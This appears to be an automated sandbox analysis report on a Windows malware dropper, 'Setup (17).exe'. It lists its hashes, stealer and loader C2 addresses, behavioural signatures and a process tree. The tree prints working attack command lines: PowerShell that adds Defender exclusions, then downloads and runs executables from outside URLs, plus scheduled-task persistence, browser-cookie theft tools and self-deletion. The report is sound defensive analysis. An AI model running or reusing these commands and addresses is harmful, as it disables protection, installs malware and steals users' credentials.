Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    560s
  • max time network
    1794s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (17).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 26 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 36 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 20 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 56 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    PID:2804
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:7288
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2660
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2484
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2472
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1820
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1416
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1300
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1220
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:356
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:4420
                      • C:\Users\Admin\AppData\Local\Temp\Setup (17).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (17).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:416
                        • C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe
                          "C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:3628
                          • C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe
                            "C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe"
                            3⤵
                              PID:7892
                          • C:\Users\Admin\Documents\VwQqyIEtIQiqOFuVWw7gWHZj.exe
                            "C:\Users\Admin\Documents\VwQqyIEtIQiqOFuVWw7gWHZj.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2128
                          • C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                            "C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:1828
                            • C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                              C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4912
                          • C:\Users\Admin\Documents\d8r7FHyHJCrDCGERrQWIRqLO.exe
                            "C:\Users\Admin\Documents\d8r7FHyHJCrDCGERrQWIRqLO.exe"
                            2⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:1320
                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:4384
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                • Executes dropped EXE
                                PID:2608
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2480
                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:4444
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:4108
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:820
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5472
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:6116
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 4444 -s 1548
                                  4⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:5436
                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Drops file in Program Files directory
                                PID:4408
                            • C:\Users\Admin\Documents\xzwin0Fq7tS5zKWYkHV0djCV.exe
                              "C:\Users\Admin\Documents\xzwin0Fq7tS5zKWYkHV0djCV.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3448
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 664
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:204
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 712
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4952
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 660
                                3⤵
                                • Program crash
                                PID:1828
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 804
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2376
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1120
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5116
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1160
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5016
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1172
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4184
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1112
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:5080
                            • C:\Users\Admin\Documents\1vooYukf6WU6k9MpHAnkwqrX.exe
                              "C:\Users\Admin\Documents\1vooYukf6WU6k9MpHAnkwqrX.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3180
                            • C:\Users\Admin\Documents\KdXpfhLTQ3BBgoWVLj7U9y3v.exe
                              "C:\Users\Admin\Documents\KdXpfhLTQ3BBgoWVLj7U9y3v.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3424
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 660
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1344
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 712
                                3⤵
                                • Program crash
                                PID:5016
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 696
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1608
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 704
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2592
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1120
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1928
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1176
                                3⤵
                                • Program crash
                                PID:864
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1172
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2436
                            • C:\Users\Admin\Documents\31PX_ym4OSr3ASnyn_2pd3hh.exe
                              "C:\Users\Admin\Documents\31PX_ym4OSr3ASnyn_2pd3hh.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:700
                            • C:\Users\Admin\Documents\YKliaHJeiJ_5l1avEzMVfFKQ.exe
                              "C:\Users\Admin\Documents\YKliaHJeiJ_5l1avEzMVfFKQ.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3940
                            • C:\Users\Admin\Documents\7HS9H3G8r_cKvEziTmf7FTb_.exe
                              "C:\Users\Admin\Documents\7HS9H3G8r_cKvEziTmf7FTb_.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2744
                            • C:\Users\Admin\Documents\eQZ3Lk9N1DfBVb17awS4tAvF.exe
                              "C:\Users\Admin\Documents\eQZ3Lk9N1DfBVb17awS4tAvF.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3992
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 760
                                3⤵
                                • Program crash
                                PID:4064
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 788
                                3⤵
                                • Program crash
                                PID:5440
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 736
                                3⤵
                                • Program crash
                                PID:5684
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 824
                                3⤵
                                • Program crash
                                PID:6028
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 992
                                3⤵
                                • Program crash
                                PID:5288
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 980
                                3⤵
                                • Program crash
                                PID:4052
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 1004
                                3⤵
                                • Program crash
                                PID:5616
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 1452
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Program crash
                                PID:4416
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 1476
                                3⤵
                                • Program crash
                                PID:3812
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 1384
                                3⤵
                                • Program crash
                                PID:6104
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 1468
                                3⤵
                                • Program crash
                                PID:6032
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 124
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:6444
                            • C:\Users\Admin\Documents\C8p6WY4rgSY35SGOqyJOVWQv.exe
                              "C:\Users\Admin\Documents\C8p6WY4rgSY35SGOqyJOVWQv.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:3932
                            • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                              "C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe"
                              2⤵
                                PID:3608
                                • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                  C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5028
                                • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                  C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4860
                              • C:\Users\Admin\Documents\es0CMIl9agW6vIuu4OFL59GL.exe
                                "C:\Users\Admin\Documents\es0CMIl9agW6vIuu4OFL59GL.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2504
                              • C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                                "C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe"
                                2⤵
                                  PID:2480
                                  • C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                                    C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4904
                                • C:\Users\Admin\Documents\D1EfYRA9RC4OkRzdWYnFh5GO.exe
                                  "C:\Users\Admin\Documents\D1EfYRA9RC4OkRzdWYnFh5GO.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1496
                                • C:\Users\Admin\Documents\eiGd2JDUU0dN9M83B3cf5hCN.exe
                                  "C:\Users\Admin\Documents\eiGd2JDUU0dN9M83B3cf5hCN.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1636
                                • C:\Users\Admin\Documents\1fbz9vi6vgAk8S1D8uvUEkxO.exe
                                  "C:\Users\Admin\Documents\1fbz9vi6vgAk8S1D8uvUEkxO.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1668
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                    3⤵
                                      PID:3732
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3052
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                        4⤵
                                          PID:6920
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                          4⤵
                                            PID:9096
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                            4⤵
                                              PID:6248
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                              4⤵
                                              • Blocklisted process makes network request
                                              PID:2196
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                              4⤵
                                              • Blocklisted process makes network request
                                              PID:5292
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                              4⤵
                                              • Blocklisted process makes network request
                                              PID:6584
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                              4⤵
                                                PID:3676
                                                • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                  5⤵
                                                    PID:2100
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                      6⤵
                                                        PID:8204
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                          7⤵
                                                            PID:6348
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                          6⤵
                                                            PID:6040
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              7⤵
                                                                PID:2228
                                                              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                7⤵
                                                                • Drops file in System32 directory
                                                                PID:3540
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                  8⤵
                                                                  • Blocklisted process makes network request
                                                                  • Checks computer location settings
                                                                  • Loads dropped DLL
                                                                  • Enumerates connected drives
                                                                  • Modifies system certificate store
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:6452
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                    9⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:8996
                                                                • C:\Windows\system32\services32.exe
                                                                  "C:\Windows\system32\services32.exe"
                                                                  8⤵
                                                                    PID:7208
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                      9⤵
                                                                        PID:6932
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                          10⤵
                                                                            PID:4032
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                        8⤵
                                                                          PID:8864
                                                                          • C:\Windows\system32\choice.exe
                                                                            choice /C Y /N /D Y /T 3
                                                                            9⤵
                                                                              PID:8656
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                    4⤵
                                                                      PID:2816
                                                                      • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                        "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                        5⤵
                                                                        • Adds Run key to start application
                                                                        • Suspicious behavior: SetClipboardViewer
                                                                        PID:4248
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                      4⤵
                                                                        PID:8012
                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                          5⤵
                                                                            PID:8596
                                                                    • C:\Users\Admin\Documents\C9EtuPtr5uw_Xo6Wkbx2vlt1.exe
                                                                      "C:\Users\Admin\Documents\C9EtuPtr5uw_Xo6Wkbx2vlt1.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2452
